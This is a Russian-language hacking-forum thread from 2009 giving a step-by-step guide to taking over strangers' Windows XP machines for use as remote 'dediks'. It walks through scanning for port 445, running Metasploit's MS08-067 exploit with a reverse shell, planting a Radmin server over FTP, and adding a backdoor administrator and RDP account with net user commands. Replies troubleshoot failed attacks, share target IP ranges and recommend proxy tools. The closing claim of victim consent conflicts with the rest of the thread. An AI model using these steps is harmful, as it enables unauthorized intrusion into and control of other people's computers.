Статьи Дедик или поможет нам Metasploit 3.2

Discussion in 'Статьи' started by stopxaker, 5 Jan 2009.

  1. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    Начну с того порядком уже надоело читать как люди ищут дедик , просят их , я уже писал , что мы ходим по этим дедикам , проксям и тд и тп .

    Сегодня мы рассмотрим метод добычи дедика по средством Metasploit 3.2 с эксплойтом MS08-067_netapi который использует уязвимость в службе SMB на 445 порту , уязвимы все Windows XP Pro sp2 и sp3 , скачать Metasploit 3.2 можно от сюда http://www.metasploit.com/ , теперь скачаем сканер портов , я использую ip angry версии 2.21 она мне больше почему нравиться , офсайт http://www.angryziber.com/w/Download , предположим что всё это мы уже скачали и установлил , запускаем сканер портов отметив в сканере порт 445 , именно он нам очень нужен , если просканировав сеть вы не увидели наличие открытого 445 порта в этой сети делать нечего , если же такой порт имеется то это очень даже хорошо !

    [​IMG]

    Затем в Метасплойт в дальшейшем МС , находим эксплойт MS08-067_netapi жмём выполнить ,

    [​IMG]


    Выбор цели Автомат , Payloads =generic/shell_reverse_tcp в RHOST ip жертвы и жмём применить , если уязвимость существует вы получите шелл (cmd.exe) удалённого компьютера , а в окошке Sessions появиться ip жертвы

    [​IMG]



    Предположим что FTP сервер у нас установлен и настроен , в cmd пишем

    Code:
    C:\>ftp
    ftp> o
    К 10.xx.xx.xx
    Связь с 10.xx.xx.xx .
    220 Welcome to 10.xx.xx.xx   FTP service.
    Пользователь (10.xx.xx.xx :(none)): anonymous
    230 Login successful.
    ftp>
    
    Я настроил фтп на anonymous без пароля , ну вот мы зашли на свой фтп , смотрим где что у нас лежит командой

    PHP:
    dir 
    Видим что лежит наш уже приготовленный радмин-сервер sys.exe зальём его на комп жертвы

    [​IMG]

    Code:
    get sys.exe
    bye
    
    Файл залит , выходим с фтп и возвращаемся а наш шелл

    [​IMG]

    смотрим залит ли файл

    [​IMG]

    и запускаем его


    PHP:
    C:\>sys.exe
    [​IMG]

    Теперь запустим RadminViewer и пробуем приконектится к нашему залитому и запущенному радмин-серверу

    [​IMG]

    Замечательно конект есть , вбиваем наш пароль и вот мы дома :D

    [​IMG]

    Теперь в радмине выбираем режим "Передачи файлов и загружаем наш terminal.exe , который сделает нам дедик на этом компьютере , хотя можно сделать учётки и в ручную


    PHP:
    cmd
    net user user pass 
    /add
    net localgroup Administrators user 
    /add
    net localgroup 
    "Remote Desktop Users" user /add
    net accounts 
    /maxpwage:unlimited
    exit
    [​IMG]

    Далее радмином в режиме "Телнет " запустим наш terminal.exe

    [​IMG]

    Затем "Подключение к удаленному рабочему столу" и пробуем приконектимся к нашему свежеиспечёному дедику

    [​IMG]

    Как видите на скрине показанно , что если мы сейчас нажём "ДА" то админа может выкинуть из свой сессии , и он может заподозрить что то не ладное в своей системе , как правило это может , повторяют может лечиться перезагрузкой компьютера , но помогает не всегда ! 50/50

    [​IMG]

    Вы спросите почему я сразу не залил terminal.exe , отвечаю буквы в шелле отображаются кракозябрами и скорость в дедике сами понимаете , так что мне важно был залить радмина , а там уже дело техники
    Ну вот у нас есть дедик , на нём мы может установить прокси , фпт и многое многое другое , примерно в течении часа получилось 5 дедиков , я думаю это не плохо !





    ps: Всё тут написанное не претендует на статью , теперь от себя хочу сказать следующие этот метод всё равно требует времени и терпения , если кто то хочет жать на кнопку "применить в Местаслойте" и чтобы он вам выкидвал готовые деды , ИДЕТЕ ЛЕСОМ , дабы не сказать грубей !

    Подробно про Метасплойт и эксплойты можно почитать тут http://www.metasploit.com/

    про Terminal.exe здесь http://forum.antichat.ru/thread36042.html

    Ну вроде теперь думаю отпадут вопросы , как и что , ищите сети со статистическими ip и дедиков будет в огромном количестве , а данной статейке лишний раз видно как уязвимы продукты Microsoft , поэтому я уже давно в качестве севера юзаю FreeBSD , а качестве десктопа Ubuntu (Linux Mint /etc) , думаю и другим пользователям пора уже сделать выводы !! В ходе эксперимента все данные пользователя не тронуты и на данное действие было дано его письменного согласие .

    источник stopxaker.ru
     
    #1 stopxaker, 5 Jan 2009
    Last edited: 16 Mar 2009
    44 people like this.
  2. qazer

    qazer Member

    Joined:
    26 Nov 2008
    Messages:
    78
    Likes Received:
    45
    Reputations:
    -2
    скачал,жму в поиске MS08-067_netapi говорит нету((
     
  3. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    Есть, смотри внимательней "Metasploit 3.2>GUI>Exploits>Windows>SMB>MS08-067_netapi "
     
    5 people like this.
  4. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    Ето так должно или у меня чето нетак???
    Установил запуснил отклылся СМД и бегут строки0_о минут так 5 уже0_о
    мне аж страшно))) если оно будет работать (метасплойт) выложу предложения как проще етим способом завладеть дедом) токо щас протестирую его)
     
    1 person likes this.
  5. zen-zen

    zen-zen New Member

    Joined:
    29 Jun 2008
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    ищи netapi )) Именно так я его нашёл
     
  6. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    Так и должно быть , после этого запустить ruby.exe и откроется GUI
     
    1 person likes this.
  7. qazer

    qazer Member

    Joined:
    26 Nov 2008
    Messages:
    78
    Likes Received:
    45
    Reputations:
    -2
    уже нашёл)всем спс.тока блин,уже полчаса сканю диапазоны - ни одного 445 порта...(
     
  8. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    а если получил я шел как через него проксию установить???
    или прогу какую кидать?
     
  9. qazer

    qazer Member

    Joined:
    26 Nov 2008
    Messages:
    78
    Likes Received:
    45
    Reputations:
    -2
    мож ктонить подскажет диапазончик,где 445 есть?
     
  10. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Юзай консольный сокc, инфа по теме:
    http://vfose.hsdn.org/forum/viewtopic.php?f=8&t=266&sid=8b2e00d52d102173376fa7c19e8bfead
    можно заюзать 3proxy http://3proxy.ru/download/
     
    #10 -=lebed=-, 5 Jan 2009
    Last edited: 5 Jan 2009
    1 person likes this.
  11. no_name

    no_name New Member

    Joined:
    5 Aug 2008
    Messages:
    17
    Likes Received:
    3
    Reputations:
    0
    запускаю и ничего открываеться cmd и пусто
     
  12. qazer

    qazer Member

    Joined:
    26 Nov 2008
    Messages:
    78
    Likes Received:
    45
    Reputations:
    -2
    инфа хорошая,тока прога не качается от туда(
     
  13. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    Блин я уже жалею что запостил эту статью :(

    ну дурдом полный в аське такие вопросы задают что епанутся можно типо:

    список буду пополнять :D


    Люди у вы все сидите в интеренете !!! у вас под носом www.google.com по всем вопросам к нему > туда в www.google.com
     
    5 people like this.
  14. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    нашел я тачки с портом 445
    доходит до етого 23:53:58 - ms08_067_netapi [*] Triggering the vulnerability...
    и все(((

    вот приблезительно такое всегда

    23:53:42 - ms08_067_netapi [*] Launching exploit windows/smb/ms08_067_netapi...
    23:53:44 - ms08_067_netapi [*] Started reverse handler
    23:53:46 - ms08_067_netapi [*] Automatically detecting the target...
    23:53:57 - ms08_067_netapi [*] Fingerprint: Windows XP Service Pack 2 - lang:Russian
    23:53:57 - ms08_067_netapi [*] Selected Target: Windows XP SP2 Russian (NX)
    23:53:58 - ms08_067_netapi [*] Triggering the vulnerability...

    и все жду 5 мин ничего непроисходит( че делать?
     
  15. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    Какая прога ? от куда не качается ?
     
  16. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    а и еще выбираю generic/shell_reverse_tcp
    потому что generic/tcp/reverse shell ненашел( а етот похожый)
     
  17. qazer

    qazer Member

    Joined:
    26 Nov 2008
    Messages:
    78
    Likes Received:
    45
    Reputations:
    -2
    :D жесть парни))))в поиске всё есть.

    стопхакер,не качается прога по ссылке что дал лебедь (прокся там).


    кстати вот сдесь очень удобно смотреть диапазоны http://worldips.info/
     
    #17 qazer, 6 Jan 2009
    Last edited: 6 Jan 2009
  18. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18

    Найди CCProxy обработай ResHackoм , и будет тебе прокся , на готовый

    CCPROXY

    вот тут в архиве soft_all.zip (радмин , terminal.exe и старый сплойт LSA )
     
    #18 stopxaker, 6 Jan 2009
    Last edited: 6 Jan 2009
  19. no_name

    no_name New Member

    Joined:
    5 Aug 2008
    Messages:
    17
    Likes Received:
    3
    Reputations:
    0
    проверил штук 20 айпи с открытым портом445 и пишет что то вроде этого "Exploit failed: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)"
     
  20. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    Я об этом писал , что не все подряд будут хакаться с открытым 445 портом , нужно искать , причины могут быть следующие : установлена заплатка от этой уязвимости , стоит сторонний фаерволл , установлен KIS и тд и тп

    ps : Я делаю так , нахожу сеть, делаю в ней дедик , а потом уже из этого деда работаю с этой сетью .
     
    #20 stopxaker, 6 Jan 2009
    Last edited: 6 Jan 2009
    1 person likes this.